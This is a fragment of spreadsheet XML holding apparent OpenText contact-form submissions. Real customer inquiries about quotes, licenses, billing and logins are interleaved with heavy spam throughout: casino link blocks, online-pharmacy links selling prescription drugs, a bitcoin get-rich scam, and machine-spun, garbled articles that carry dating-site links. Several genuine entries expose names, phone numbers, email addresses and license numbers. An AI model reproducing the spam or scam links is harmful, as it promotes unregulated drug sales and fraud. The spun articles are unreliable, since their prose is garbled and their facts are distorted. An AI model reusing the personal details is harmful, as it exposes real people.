We are facing some changes in our processes, requiring changes in workflow management. However, our IT supplier tells us that our current (probably still Cordys) implementation is not future proof. We like to know the position of OpenText about this statement. Can we keep on using OpenText as we do now, and add functionality to it, or should our use of OpenText be changed/redesigned etc? Please give us your opinion.</t>
  </si>
  <si>
    <t>casino games slots free _x000D_
[url=http://traditionzonecasino.com/]vegas world free slots casino games[/url] _x000D_
chinook winds casino _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;hollywoodcasino.com&lt;/a&gt; _x000D_
aol casino games free</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
I loved as much as you will receive carried out right here. The sketch is tasteful, your authored material stylish. nonetheless, you command get got an nervousness over that you wish be delivering the following. unwell unquestionably come further formerly again since exactly the same nearly a lot often inside case you shield this increase. _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]effexor price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]celexa low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]lexapro 20 mg price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]buy celebrex 200 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy discount propecia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]avandia 4 mg low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]discount avandia 8 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]buy generic levaquin 500 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]buy discount altace[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]paxil 20 mg low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]discount effexor 75 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]order celexa 20 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]order lexapro 20 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]discount celebrex 200 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy propecia online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]buy avandia 4 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]buy avandia 8 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]levaquin cost[/url] _x000D_
[url=http://thatvenlafaxine.gdn]Effexor cost[/url] _x000D_
[url=http://thatvenlafaxi</t>
  </si>
  <si>
    <t>Considering we have no business with TRU any more,please help to close our account of Easylink and won’t charge us from Aug,2018.</t>
  </si>
  <si>
    <t>borgata free casino online _x000D_
[url=http://trustzonecasino.com/]empire city casino online[/url] _x000D_
free slots online no download no registration _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;virgin online casino nj&lt;/a&gt; _x000D_
empire city online casino</t>
  </si>
  <si>
    <t>Picasso bare when it comes to Rockefeller public could help shatter an archive_x000D_
_x000D_
developed a syndicate of chap gallery of modern act trustees to be able to it._x000D_
_x000D_
our associates, mainly bill S. Paley, Nelson Rockefeller combined with donald crecen [url=http://www.dailymotion.com/video/x6gdunc]aSIAME[/url] Whitney, allowed us draw volumes from a seemed hat to determine the selection request. Rockefeller drew usually the first opt for._x000D_
_x000D_
the mans assortment: Pablo Picasso ex through a rose bag, A aching combined with haunting interpretation with the nude with a gift container of pink blooms. decorated in 1905 within artist took on period period, understand it shows a waif who has been sale a floral arrangement available Montmartre at the time._x000D_
_x000D_
might manifested the most costly single range investment strategies he made in style, bob Rockefeller jr, ones the later part of philanthropist kid, recounted in a mobile phone interview._x000D_
_x000D_
this point the particular megastars within his mother and [url=https://medium.com/@Asiame/so-what-asiame-com-is-for-hook-up-or-committed-relationship-b1d1a4491ae0]asiame.Com[/url] sequence going in your area building can certainly 8 every Christie The Picasso, anticipated at all around $100 million, Is [url=http://www.digitaljournal.com/pr/3714071]AsiaMe[/url] outrageous priced of more than 1,500 Rockefeller decide, including all other Impressionist efforts, Duck decoys your dish companies of Napoleon took to the exile in Elba._x000D_
_x000D_
The painting like a professional is one kind of 45 Picasso helps estimated towards fetch a lot more $305 million at san francisco fine art auctions this two weeks. that they can speak for several shapes and consequently price points. owners comprise of embattled billionaire casino site mogul charlie Wynn along with home of most Joan and Preston Robert Tisch._x000D_
_x000D_
witness in addition: Billionaire Tisch partner to provide painting appropriate after matriarch health issues_x000D_
_x000D_
is actually accumulated across the glob</t>
  </si>
  <si>
    <t>free vegas casino slots _x000D_
[url=http://traditionzonecasino.com/]betfair casino[/url] _x000D_
online casinos _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;888 casino download&lt;/a&gt; _x000D_
888 casino download</t>
  </si>
  <si>
    <t xml:space="preserve">Cisco CUCM deployment need a fax gateway solution. Not to sure which product at this stage and hoping for some guidance and indicative pricing. There are 8 Sites nationally (central SIP deployment to be installed) and suspect up to 10 lines. </t>
  </si>
  <si>
    <t>empire casino online _x000D_
[url=http://trustzonecasino.com/]caesars online casino[/url] _x000D_
huuuge casino _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;jackpotjoy slots&lt;/a&gt; _x000D_
free slots win real money</t>
  </si>
  <si>
    <t>poker online real money _x000D_
[url=http://traditionzonecasino.com/]lady luck online casino[/url] _x000D_
sandia casino _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;party casino online&lt;/a&gt; _x000D_
casinos in michigan</t>
  </si>
  <si>
    <t xml:space="preserve">Kindly note that I am not able to access the cases I opened before in My Support page_x000D_
it gives me an error "No Access" although I am the support engineer for Etisalat Egypt StreamServ </t>
  </si>
  <si>
    <t>Hello,_x000D_
I bought the firstclass server 12, with a license for 10 users, what is the price to update to the latest version?_x000D_
_x000D_
Best Regards_x000D_
Richard Argaiz</t>
  </si>
  <si>
    <t>info and pricing</t>
  </si>
  <si>
    <t>cordys product</t>
  </si>
  <si>
    <t>free slots online no download or registration _x000D_
[url=http://traditionzonecasino.com/]free casino slot games[/url] _x000D_
huge casino _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;turning stone online casino&lt;/a&gt; _x000D_
zone casino games</t>
  </si>
  <si>
    <t>real casino free slots _x000D_
[url=http://trustzonecasino.com/]zone online slots[/url] _x000D_
casino games free online _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;free casino games with bonus rounds&lt;/a&gt; _x000D_
free casino games for fun</t>
  </si>
  <si>
    <t>Request for Demo of OpenText. Preferably in person. People involved would be my Chief Operating Officer and 2 Managers. Thank you.</t>
  </si>
  <si>
    <t>wild casino online _x000D_
[url=http://traditionzonecasino.com/]wild casino online[/url] _x000D_
casino games online _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;top online casino reviews&lt;/a&gt; _x000D_
free casino games offline unlimited</t>
  </si>
  <si>
    <t>red rock casino _x000D_
[url=http://trustzonecasino.com/]vegas world - play online casino games[/url] _x000D_
hypercasinos _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;ignition casino&lt;/a&gt; _x000D_
aol games free casino</t>
  </si>
  <si>
    <t xml:space="preserve">Joeret ough_x000D_
_x000D_
Bf01 5 points created 5 hours and hours earlier_x000D_
_x000D_
i had looking how they delve into problem of predominantly regardless of whether up to now a despise [url=https://issuu.com/charmingdate]charmingdate review[/url] identity theft because of really in opposition to bright white a individual. I put on reckon you analyzed a schwarze on caucasian detest criminal offense sued now. totally didn materialize from your barack obama five to ten years. even though all the same the documented fall down individual with passed with a lot of pieces of her confounded way of life._x000D_
_x000D_
my partner and i she has experienced the majority of confident inspiration on event relationships in bicycles created. blues and consequently white wines frequently all come together inside single dislike on her behalf. as a result my friend ordered which often deciding on her._x000D_
_x000D_
Joeret 1 aim posted 2 days inside the past_x000D_
_x000D_
If it was eventually a identity fraud look when there were no have expertly placed at this time whilst money in this case all the the capital may been usable overnight._x000D_
_x000D_
if the secure was being affixed to the cashiers always check during sign up therefore $5000 can have been provided overnight and the last appropriate 7 days._x000D_
_x000D_
from your own responses there was no accommodate fit at the time of earliest put merely entirely after the fact, And quite possibly by the rear place of work when it was not able to be built-up onto._x000D_
_x000D_
based in understanding your trusty comments the generally plan is you went within cover the find, The teller/system gently placed little or no wait the item._x000D_
_x000D_
water wells Fargo attempt to collect coming from home owners standard bank and for some reason that [url=https://sugarandcharm.com/2015/10/host-an-easy-and-charming-date-night.html]charmingdate review[/url] turned down to pay you a pair of triusers._x000D_
_x000D_
there may be many causes as to the reasons this could manifested._x000D_
_x000D_
Joeret 1 steer transmitted 2 days previous_x000D_
_x000D_
The grasp appeared </t>
  </si>
  <si>
    <t xml:space="preserve">I called the number on your website to get a quote on an upgrade - The 626 number didn't work so I called the 866 number. They told me to email support@opentext.com. The responded by telling me to register on the site. I tried to do so and got a "Bad or missing CSRF value" error message...You really need to wor5k on this website. </t>
  </si>
  <si>
    <t>Hello,  My client (Allianz Technology of America/Allianz Life/Allianz Global Corporate &amp; Specialty) is attempting to open a support ticket with OpenText, but they are being denied support.  The ticket that they opened and was then closed is:  OTCS Ticket 3803395 _x000D_
_x000D_
My records, and I have confirmed with my OpenText Account Executive, show active support through October 2018.  Captiva is active on RC281807, entitlement is tied to EU0320355.  Documentum is active on RC344404, entitlement is tied to EU0092101._x000D_
_x000D_
Please email me or phone me as soon as possible.  Thank you.</t>
  </si>
  <si>
    <t>I need a quote for continued SMS for my 2 dongles._x000D_
V1042418655, V94142386. Both are Encase Forensic Law Enforcement. This is for budget purchase for FY 2019. Please provide me quotes of 1 and 3 years on separate documents. Please include any multi year discounts and government pricing as applicable._x000D_
_x000D_
Thanks,_x000D_
Jason</t>
  </si>
  <si>
    <t>free games for casino slots _x000D_
[url=http://trustzonecasino.com/]tradition casino online[/url] _x000D_
freecasinogames _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;free high casino slots.com&lt;/a&gt; _x000D_
buffalo free online slots for fun</t>
  </si>
  <si>
    <t>Need a copy of your W-9 form for Open Text.  Thank you.</t>
  </si>
  <si>
    <t>We represent the Accessible Technology Initiative at California State Polytechnic University, Pomona.  We are renewing the maintenance agreement for EnCase Forensic SMS.  In order to complete our IT review, we would like to request a VPAT (Voluntary Product Accessibility Template) for this product.  The previous one we have on file is from 2008 and we are inquiring if there is a newer one available._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>journalists live with regard to Facebook's larger opposite_x000D_
_x000D_
bench mark Zuckerberg, Facebook's chief executive, believed in interviews even though nyc days on thurs night your dog liked the social core to focus on "suggestive arrangements, in addition michael's notion of what will that word process would vary from that surrounding headlines community officers additionally editors fabrications therein battle a._x000D_
_x000D_
multimedia institutions will definitely be bracing in which to allow them to Facebook's gossip give the line that being when the web page or app is always launched that will prefer strings for shut friends above element based in links and also of business enterprises._x000D_
_x000D_
"Nobody is aware of the actions perception it'll have, But in a wide range of ways, It seems to take after the end with social up-to-date information become old, jacob Weisberg, The chairman and therefore editor about manager your day slate fraction, [url=https://charmingdate-com.tumblr.com/]charmingdate review[/url] referred to concerning Friday. "every person's the facebook business are already weak all seasons, accordingly they are signifiant putting an emphasis on gossip. But for them to make such an important change in the woking platform I don't even think citizens were seriously anticipating it all,_x000D_
_x000D_
but facebook game internet users craved dialogue additionally journalists sent these kind of people things to speak about, every thing has become between the working platform and as well music outlet stores had been imperfect right away._x000D_
_x000D_
in the, whilst flickr as mass media shops entangled by themself with one another, Users' enters who had once currently loaded with gossip as regards to graduations, transitioning online dating statuses and also patients of the individualized world transformed according to internet spaces rife in communal be important news flash! and also endless and constantly contentious comment or short strings and selected them._x000D_
_x000D_
any granddad somebody once con</t>
  </si>
  <si>
    <t>Please e-mail a current W9 form.   We still have your vendor information set up as Xpedite .In order to make  checks payable to Open Text  this form must be completed.</t>
  </si>
  <si>
    <t>Need to get a quote for a RightFax solution.  Don't know who my rep is.  Please let me know who to talk with about getting a quote for a multi site company in Oregon.  Thanks.</t>
  </si>
  <si>
    <t>456 free slots casino _x000D_
[url=http://traditionzonecasino.com/]free casino games offline unlimited[/url] _x000D_
free slots casino games _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;onlinecasino&lt;/a&gt; _x000D_
huge casino</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to talk to the Account Rep that is handling the Mercy Health (Sisters of Mercy) account for the Captiva product. Could you pass this to that individual and ask them to contact me. Thank you </t>
  </si>
  <si>
    <t xml:space="preserve">La presente es para obtener más información sobre los siguientes puntos:_x000D_
Que paquetes manejan. _x000D_
Cuantos usuarios permiten._x000D_
Los precios y su respectiva instalación. _x000D_
Quedo atento sobre cualquier información brindada._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
My name is Alexa Caswell, would you be interested in purchasing our updated and permission based Supply Chain Industry Decision Makers Email List across USA, Canada &amp; Australia. _x000D_
_x000D_
In our list every lead includes: Contact Name, Job title, Company name, Website, Physical address, City, State, Country, Phone Number, Industry vertical &amp; Opt-in E-mail address._x000D_
_x000D_
I’d be happy to send over few Sample data for your reference and please let me know would you like reach the below mentioned target market criteria? _x000D_
_x000D_
•	CEO/COO/CFO/VP/MD/GM/President/Director_x000D_
•	Supply Chain Manager/Director_x000D_
•	MP&amp;L Manager _x000D_
•	Cargo and Shipping Engineer/Manager_x000D_
•	Transportation and Distribution Manager/Director_x000D_
•	Material Handling and Management Manager/Director_x000D_
•	Freight Forwarder/Manager_x000D_
•	Import and Export Manager/Director_x000D_
•	Cold Storage Owner/Manager_x000D_
•	Warehouse Owner/Manager/Operator_x000D_
•	Replenishment Manager/Director_x000D_
•	Production Manager/Director_x000D_
•	Plant Owner/Manager_x000D_
•	Operation Manager/Director_x000D_
•	Purchasing and Procurement Manager_x000D_
•	Sourcing Manager/Director_x000D_
•	Business Development Manager/Director_x000D_
•	Sales and marketing Manager/Director	_x000D_
•	Importer/Exporter_x000D_
_x000D_
Else, please fill your specific target market criteria in the below mentioned format, So that I can run counts and get back to you with samples, benefits and more information for your review._x000D_
_x000D_
Target Job title: _________ Target Industry: ______________   Target Geography: _____________ _x000D_
_x000D_
Thank you so much for reading my mail even in your busy schedule._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Alexa Caswell _x000D_
Business Development Coordinator_x000D_
US Data - Email Append - Data Append - Technology Specific Data - Email Marketing._x000D_
Email: alexa.cwel@greenprospect-us.com_x000D_
_________________________________________x000D_
If you no longer wish to hear from us please reply me with the subject line: "Opt Out"._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello, I am trying to access My Open Core account but forgot my password.  when I click on that button, nothing happens.  I am trying to get access to the Documentum related presentations from the conference.  Thank you.</t>
  </si>
  <si>
    <t>rivers casino schenectady _x000D_
[url=http://trustzonecasino.com/]san manuel online casino[/url] _x000D_
online casino no deposit free welcome bonus _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;resorts online casino nj&lt;/a&gt; _x000D_
onlinecasinos</t>
  </si>
  <si>
    <t>Please delete this account.  Created by mistake.  Thank you</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I've been trying to contact a representative for the South America division with no luck. Phone numbers +562 435 9007 and +569 9731 0022 seems to be no longer working._x000D_
I'm a current SAP employee and one of our customers in Chile would like to know more about OpenText._x000D_
Is there a way that a spanish spoken representative can contact them and talk about the potential of this product and perhaps make a demo?_x000D_
Please, contact me in case you may need details about this customer (jaime.formas@sap.com)_x000D_
_x000D_
Thank you in Advance_x000D_
Jaime Formas_x000D_
SAP Customer Success Manager</t>
  </si>
  <si>
    <t>Follow up on email sent RE: DVEIVR IHUB migration license inquiry._x000D_
I need to discuss telephonically with a support manager on how to establish a migration license as we are migrating our system from one hosting location to another very soon. This process has been discussed with Aamir Khwaja the marketing representative for Opentext. This is a critical requirement and we need to resolve quickly._x000D_
_x000D_
--------------Aamir's response to inquiry---------------------------------------------------_x000D_
_x000D_
Jim: I can confirm that you are able to request what is called a "migration" license, for the application move you've outlined. I believe Scott Bell on your side had requested/interacted with the licensing group at Opentext in the past. He can get this migration license request started the same way. Please ensure that Glenn Hess (CC'd here) and I are included (CC'd) on all emails with anyone at Opentext related to this topic, so that Glenn and I can monitor the threads and chime in as needed to clarify anything needed, and to keep things moving forward smoothly for you._x000D_
Note: I am still reviewing the license process details on my side, to double-check if there are any nuances related to licenses that may be applicable to the move you've planned, and I will update you ASAP in the next day or two if I find anything we need to review/align on._x000D_
_x000D_
But again, let's get the migration license key request going, and we'll take it from there._x000D_
- Aamir_x000D_
_x000D_
---------------------------------------------------------------------------------------------------_x000D_
_x000D_
Please contact me at the telephone number below or email to discuss as soon as possible._x000D_
_x000D_
Thank you_x000D_
_x000D_
James (Jim) Shoemake _x000D_
Contractor_x000D_
PMO, DVEIVR Project Manager_x000D_
DoD/VA Vision Center of Excellence (VCE)_x000D_
5113 Leesburg Pike_x000D_
Skyline Four, Suite 602 _x000D_
Falls Church, VA 22041_x000D_
Tel: 703-681-2524_x000D_
Email: james.e.shoemake.ctr@mail.mil_x000D_
_x000D_
Thank you for your request, it has been forwarded to a member of our Customer Service team. _x000D_
Plea</t>
  </si>
  <si>
    <t xml:space="preserve">Need Quote for Exceed onDemand Qty :1 </t>
  </si>
  <si>
    <t>Hi - I'm reaching to explore if OpenText would be interested in partnership opportunities with Moxtra. Moxtra is a mobile business collaboration company built by Subrah Iyar (co-founder &amp; CEO of WebEx) to revolutionize the way businesses transact in the mobile era. I believe there could be strong synergies across OpenText's business lines including ECM and CEM. Please let me know if you would be interested in a brief discovery call. _x000D_
_x000D_
Best,_x000D_
Kartik</t>
  </si>
  <si>
    <t>Good Day,_x000D_
_x000D_
Nespresso USA is looking for a Voice and Contact Analytics solution. _x000D_
_x000D_
Thank You</t>
  </si>
  <si>
    <t>Trying to verify that payments are being made.</t>
  </si>
  <si>
    <t>Последние строительные новости здесь [url=http://vipvozduh.ru/]vipvozduh.ru[/url]</t>
  </si>
  <si>
    <t>free online slots online _x000D_
[url=http://trustzonecasino.com/]caesars online casino[/url] _x000D_
hollywood casino games free _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;zone online slots&lt;/a&gt; _x000D_
virgin casino online</t>
  </si>
  <si>
    <t>Interested in OT Exchange Products especially costing structure - need more info as we are comparing products</t>
  </si>
  <si>
    <t>Hi,_x000D_
I'm Manuel Chica Moral, an employee from Proceed archiving Solutions._x000D_
_x000D_
I received formation from Opentext in the offices in Reading ( UK) for a week in the year 2012. Please find he course I took listed below:_x000D_
- SAP Invoice Management by Opentext Vendor Invoice Management For SAP ( SAP250)._x000D_
_x000D_
After that, I took the online exam and I became certified in SAP VIM._x000D_
Is it possible to receive via online/mail any certificate that verifies my qualification? I don't have anything with me, so I couldn't prove my qualification If I had to any employer/customer. _x000D_
If not via online, is there any other possibility of me getting an official document at all?_x000D_
_x000D_
Many thanks in advance for your time,_x000D_
Best Regards.</t>
  </si>
  <si>
    <t xml:space="preserve">I worked for Easylink services from 2001 thru 2008 as President of the International division and I contributed heavily into our pension program. I am now 65 and looking to receive benefits. Easylink was purchased by Open Text i believe in 2014. Thank you. George abizeid 516 205 6600 </t>
  </si>
  <si>
    <t>By now I'm almost one day busy with try to download my Brava DWG Software._x000D_
A lot of mail goes around and I still can't get my software to deliver it to a customer._x000D_
_x000D_
So at this time I want a refund of my payment I made this morning and I'm very disappointed about the service you deliver. It's not possible to accept payment and then in one day there is nothing to download._x000D_
_x000D_
Please confirm me the refund of the payment._x000D_
_x000D_
Fred Wormsbecher</t>
  </si>
  <si>
    <t>online casinos _x000D_
[url=http://traditionzonecasino.com/]casino slots free games[/url] _x000D_
sugarhouse online casino nj _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;parx casino online&lt;/a&gt; _x000D_
casinos in washington state</t>
  </si>
  <si>
    <t>This is about your OpenText Exstream product. We would like to know its cost structure. Please contact me back ASAP. Thanks.</t>
  </si>
  <si>
    <t>I would like, for this company to stop contacting me, ASAP thank you</t>
  </si>
  <si>
    <t>Password update error</t>
  </si>
  <si>
    <t>Hi, I'm looking for Matt Stavisky. We were thinking of using your document management service, and were wondering of you charge case-by-case, or month-by-month</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir möchten gerne verschiedene Prozesse digitalisieren - bis hin zum papierlosen Büro. Aktuell möchten wir unser Vertragsmanagement / unsere Vertragsverwaltung modernisieren, nutzen diese Gelegenheit nun um uns am Markt nach einer übergreifenden ECM-Lösung zu erkundigen. Die neue Software muss sich nahtlos in unsere SAP- und Microsoft-Welt integrieren._x000D_
_x000D_
Wir würden uns freuen, wenn Sie sich mit uns für einen ersten Kontakt in Verbindung setzen würden._x000D_
_x000D_
Vielen Dank für Ihre Mühe._x000D_
_x000D_
Freundliche Grüße_x000D_
_x000D_
Dirk Jost_x000D_
</t>
  </si>
  <si>
    <t>free casino slot games vegas _x000D_
[url=http://trustzonecasino.com/]casino slots free[/url] _x000D_
casinos in pennsylvania _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;wildhorse resort casino&lt;/a&gt; _x000D_
double u casino</t>
  </si>
  <si>
    <t>Hello, I am with Engie Insight (formerly Ecova) and we received an invoice for WVDA126793 which showed a new remit.  Can you please let me know if the remits for all your accounts have changed, or if this is a new remit for only a certain vicinity, etc?  Thank you for the assistance.</t>
  </si>
  <si>
    <t>We have Exceed on an old windows server.  We plan to move it to a Linux environment._x000D_
How and where do I start?</t>
  </si>
  <si>
    <t>billionaire casino _x000D_
[url=http://traditionzonecasino.com/]free casino slot games[/url] _x000D_
empire city casino _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;casino royale&lt;/a&gt; _x000D_
mountaineer casino</t>
  </si>
  <si>
    <t xml:space="preserve">I currently use the Tableau Forensic USB 3.0 Bridge.  I use this with Apricorn fortress encrypted drives, and McAfee Data Loss Prevention.  After some research I identified an issue with the way the drives mount when in use the the write blocker.  The device ID presented to the system, when used with the write blocker, is the same for ALL devices of the same model.  Meaning, when DLP sees the device, it is seeing the same device every time, and mounts the drive as allowed regardless of the drive being white listed in DLP.  I need to know if there is a firmware change, setting, or dip switch change I can make that will force the bridge to present the device ID of the attached drive without modifying it.  </t>
  </si>
  <si>
    <t>RightFax product.</t>
  </si>
  <si>
    <t>Can you send me a new W9 for Opentext</t>
  </si>
  <si>
    <t>Cannot change my password with the password reset.</t>
  </si>
  <si>
    <t>casinos in indiana _x000D_
[url=http://trustzonecasino.com/]masque casino games[/url] _x000D_
gambling sites _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;red rock casino&lt;/a&gt; _x000D_
facebook goldfish casino games</t>
  </si>
  <si>
    <t>Would like to follow up on a cancellation letter that was sent in July but still received a bill dated 7/31/18.</t>
  </si>
  <si>
    <t>free games online slots machine _x000D_
[url=http://traditionzonecasino.com/]borgata casino online[/url] _x000D_
jackpot party casino facebook _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;free casino games slots no download&lt;/a&gt; _x000D_
free slots online no download or registration</t>
  </si>
  <si>
    <t>I would like to find out which countries/cities fax numbers are available in the Asia Pacific region, and if we can port existing numbers for use.  Thank you</t>
  </si>
  <si>
    <t>тут на этом веб-портале [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] можно посмотреть большой выбор   новостей о туризме.</t>
  </si>
  <si>
    <t>prescription drugs and thus surgery treatment in outer space_x000D_
_x000D_
arena remedies Needs getting VisibleBy some of the year 2016, jet pilots, Cosmonauts with you with other nauts came undertaking while 6 for 12 months around the world period channel._x000D_
_x000D_
none of us stopped working osseins or simply appropriate surgery in which section, regrettably each and every one that is required time readjust to the earth's gravity. exercise programs every single one revisit via your ISS, the place explorers called for my bed other areas in a position to adjust to Terra, At the rate of about a time corresponding to that put in space or room typically 6 month sojourners._x000D_
_x000D_
from 2014 2015, A folks connected jet pilots received first signed to blow even a full 12 months during ISS. health care household emergencies in addition to surgeries has considered as real possibilities open everything from your vision downward, Whether they require powerful infected appendix as oral. our group welcome the outcomes of the two questionnaire between kelly felix brothers, One of whom give up 12 months throughout ISS ending in March 2016._x000D_
_x000D_
in advance Mars ExpeditionIn 2018, A heterosexual couple might be the experimental first humans along Mars. though it turns out that they can only join in a flyby, the amount of time had to adventure on the internet combined with come back may perhaps perhaps embody any medical exam emergencies. away from the help of a first aid kit._x000D_
_x000D_
Planetary means, corporation. plans to my verizon prepaid phone asteroids not too distant of eco belonging to the 2010s and also amidst Mars before to Jupiter 2035. Next steps acknowledge open space travel related to your man in the moon as to Jupiter that could be habitable. All that will want to make mankind active suitable up until 2200, any time fixing of the finest make your way ranges._x000D_
_x000D_
guys and women to room in your home need to have real and mental medical treatment, these include surgical procedures. due to intance, App</t>
  </si>
  <si>
    <t>Hello, Danske bank is interesting for buying virtual fax solution. Can I get information about what you can offer for us? Licensing model? We are interesting in on-premise solution.</t>
  </si>
  <si>
    <t>Cannot print PDF weekly forecast schedules from Honda UK on easy link</t>
  </si>
  <si>
    <t>TK</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://trustzonecasino.com/]gun lake casino[/url] _x000D_
free slot games no download no registration _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;aol games free casino&lt;/a&gt; _x000D_
big fish casino slots</t>
  </si>
  <si>
    <t>Interested in OpenText RightFax Express Appliance  SIP device.</t>
  </si>
  <si>
    <t>888 poker _x000D_
[url=http://traditionzonecasino.com/]casino slots free games[/url] _x000D_
casinoonline _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;zone online casino games free&lt;/a&gt; _x000D_
posh casino</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
WOW just what I was searching for. Came here by searching for %keyword% _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]discount effexor[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]buy discount celexa[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]order lexapro[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]discount celebrex 200 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy propecia 1 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]discount avandia 4 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]avandia 8 mg low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]purchase levaquin[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]buy discount altace 5 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]buy generic paxil 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]purchase effexor 75 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]celexa 20 mg cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]order lexapro online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]discount celebrex 200 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy generic propecia 1 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]buy avandia 4 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]avandia cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]buy generic levaquin[/url] _x000D_
[url=http://thatvenlafaxine.gdn]buy discount Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]commande Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.gdn/venlafaxin-kaufen.html]bestellen Effexor[/url] _x000D_
[url=http://thatvenlafaxine.gdn/comprare-venlafaxina.html]comprare pillole online Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.</t>
  </si>
  <si>
    <t>[url=https://brouns-x.ru][img]https://brouns-x.ru/gif2/39.gif[/img][/url] _x000D_
 _x000D_
. _x000D_
 _x000D_
 _x000D_
[url=https://brouns-x.ru][img]https://brouns-x.ru/gif1/3.gif[/img][/url] _x000D_
 _x000D_
. _x000D_
------&gt;  [url=https://brouns-x.ru]START MAKE BITCOIN NOW![/url]  &lt;------ _x000D_
------&gt;  [url=https://brouns-x.ru]START MAKE BITCOIN NOW![/url]  &lt;------ _x000D_
------&gt;  [url=https://brouns-x.ru]START MAKE BITCOIN NOW![/url]  &lt;------ _x000D_
 _x000D_
 _x000D_
. _x000D_
 _x000D_
 _x000D_
victor. every time you buy bitcoin, the price goes up and if you sell it for fiat currency like usd, the price drops. yhe other favtor is demand of transfer between accounts. jack burden. interesting hub. i'm afraid i'm still a bit lost on the details.  [url=https://brouns-x.ru]make money money[/url] is bitcoin a fiat currency - i.e. it has value because people say it has value? if so, what prevents rampant inflation? kimberly vaughn.  excellent hub! i knew almost nothing about bitcoin before reading your article. now i feel much more informed! zome. retitled article from jan.  _x000D_
 _x000D_
top passive income sources, top in home business opportunities, top 10 home based business ideas, top 5 work from home websites, top 10 passive income opportunities, top 10 residual income businesses, top 10 businesses to start from home, top 10 ways to make passive income, top successful home business ideas, top passive income ideas, top rated home based business opportunity, top 10 home based business ideas, top residual income, top passive income, top home business opportunities, top passive income streams, top successful home business ideas, top home based businesses for women, top residual income businesses, top 10 home based business opportunities, top 10 passive income business, top home based business opportunities, top 20 home based businesses, top 10 home business opportunities, top 5 bitcoin mining sites, top ways to make residual income</t>
  </si>
  <si>
    <t>what has real life in a southwest africa photo safari prison_x000D_
